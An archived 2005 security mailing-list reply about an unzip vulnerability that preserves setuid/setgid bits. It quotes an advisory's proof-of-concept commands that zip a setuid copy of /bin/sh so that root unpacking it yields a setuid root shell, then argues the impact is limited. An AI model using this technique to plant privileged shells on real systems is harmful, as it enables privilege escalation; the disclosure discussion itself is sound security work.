Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files

from [John Simpson] Network Security [Permanent Link]
Subject: Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files
Date: Mon, 28 Feb 2005 17:20:10 -0500
On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote: 

III. Exploit

It's realy easy to test this vulnerability. You can create a malicious ZIP
file following this example:

 $ cp /bin/sh .
 $ chmod 4777 sh
 $ zip malicious.zip sh


When another user (including root) unpacks the file, a setuid shell file will
be created without any warning, as you can see here:

 # id
 # unzip malicious.zip
 Archive:  malicious.zip
  inflating: sh
 # ls -l sh
 -rwsrwxrwx  1 root root 705148 Jan 16 17:04 sh

this only works if the user un-zipping the file is already root. otherwise it creates an "sh" binary which is setuid to the user who unzipped the file. this kind of "exploit" is only useful if you can somehow trick root into unzipping the file- it cannot be used to gain root on a machine where you don't already have it.

although i will agree that having the unzip program warn the user when creating a setuid or setgid file is a good idea in general.

--------------------------------------------------
| John M. Simpson - KG4ZOW - Programmer At Large |
| http://www.jms1.net/           <jms1@jms1.net> |
--------------------------------------------------
| Mac OS X proves that it's easier to make UNIX  |
| pretty than it is to make Windows secure.      |
--------------------------------------------------

Attachment: PGP.sig
Description: This is a digitally signed message part

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : A vulnerability in TCP, please_reply_to_security
Previous by Thread:  7a69Adv#22 - UNIX unzip keep setuid and setgid files, Albert Puigsech Galicia
Next by Thread:  WASC-Articles: 'The Insecure Indexing Vulnerability - Attacks Against Local Search Engines' By Amit Klein, robert
Indexes:  [Date] [Thread] [Top] [All Lists]